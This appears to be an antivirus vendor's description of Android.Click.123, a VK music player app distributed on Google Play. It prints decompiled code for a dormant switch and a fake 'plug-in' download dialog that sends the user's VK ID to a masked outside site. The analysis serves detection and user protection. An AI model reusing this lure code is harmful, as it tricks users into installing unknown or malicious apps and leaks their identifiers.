SHA1: 761200fde7c633274119136071a3ae248172b6d9
A detection for the “Music and video from VK” («Музыка и Видео из ВК») player which does not initially pose any threat. This application is distributed via Google Play and has the same creator as the Android.PWS.Vk.3 Trojan.
Android.Click.123 is a fully-featured player; yet, at every user action, it calls the isPlugin() method, which returns the value “1” and does not perform any function in this program’s version.
public static boolean isPlugin() {
return 1;
}
However, if attackers modify this function, the Trojan will activate the plugin() method prompting the user to install some necessary plug-in:
public void plugin() {
if(VK.getInstance().userId != 0) {
Builder alertDialog$Builder0 = new Builder(((Context)this));
alertDialog$Builder0.setMessage("Необходимо скачать дополнение, перейдите по ссылке для
скачивания");
alertDialog$Builder0.setPositiveButton("Перейти", new DialogInterface$OnClickListener() {
public void onClick(DialogInterface dialog, int which) {
Intent intent0 = new Intent("android.intent.action.VIEW");
intent0.setData(Uri.parse("http://plug*****.info/?id=" + VK.getInstance().userId));
MainActivity.this.startActivity(intent0);
dialog.dismiss();
}
}).setNegativeButton("Отмена", new DialogInterface$OnClickListener() {
public void onClick(DialogInterface dialog, int which) {
MainActivity.this.showAds();
}
}).show();
}
}
At present, this module is benign and only informs the user that the plug-in is enabled:
super.onCreate(savedInstanceState);
this.setContentView(2130968601);
Toast.makeText(((Context)this), "Плагин включен", 1).show();
Nevertheless, there is a high risk that cybercriminals will change this program to another one, which means that the user may install some unknown application (even a malicious one), mistakenly taking it for a player module.